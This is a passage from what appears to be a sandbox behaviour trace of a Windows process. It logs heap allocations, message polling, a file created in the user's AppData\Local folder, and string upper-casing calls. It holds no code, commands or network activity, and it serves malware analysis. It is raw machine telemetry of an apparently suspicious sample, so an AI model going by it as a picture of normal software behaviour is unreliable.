Flags=0x0, Size=0x4) returned 0x2a72b08 [0203.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0203.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0203.226] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0203.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0203.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0203.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0203.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0203.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0203.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0203.227] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.TileDataLayer" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.tiledatalayer"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0203.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7080 [0203.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0203.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0203.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0203.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0203.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0203.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0203.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0203.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0203.234] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0203.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0203.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0203.234] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0203.234] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0203.234] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0203.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0203.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0203.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0203.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0203.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0203.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0203.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0203.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0203.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0203.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0203.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0203.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0203.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0203.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0203.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0203.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0203.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0203.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0203.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0203.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0203.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0203.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0203.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0203.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0203.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0203.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0203.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0203.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0203.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0203.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0203.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0203.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0203.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0203.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0203.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0203.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0203.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0203.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0203.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0203.236] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0203.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0203.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0203.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0203.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0203.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0203.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a58 [0203.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0203.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0203.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0203.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0203.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0203.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0203.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0203.236] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0203.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0203.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0203.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0203.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0203.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0203.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0203.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0203.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0203.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0203.237] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0203.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0203.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0203.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0203.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b28 [0203.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0203.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0203.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0203.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0203.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0203.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73068 [0203.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0203.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0203.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0203.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730c8 [0203.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0203.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0203.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a715e8 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0203.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaac8 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0203.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0203.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0203.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0203.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0203.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0203.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0203.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0203.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0203.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0203.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0203.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0203.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0203.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0203.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0203.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0203.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0203.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0203.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0203.239] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0203.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0203.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0203.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0203.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0203.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0203.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0203.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0203.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0203.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0203.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0203.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0203.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0203.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0203.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0203.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0203.240] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0203.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0203.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0203.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0203.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0203.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0203.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0203.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0203.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0203.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0203.241] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0203.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0203.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0203.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0203.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0203.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0203.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0203.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0203.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0203.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0203.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0203.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0203.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0203.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0203.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0203.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0203.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0203.241] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0203.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0203.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0203.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0203.242] 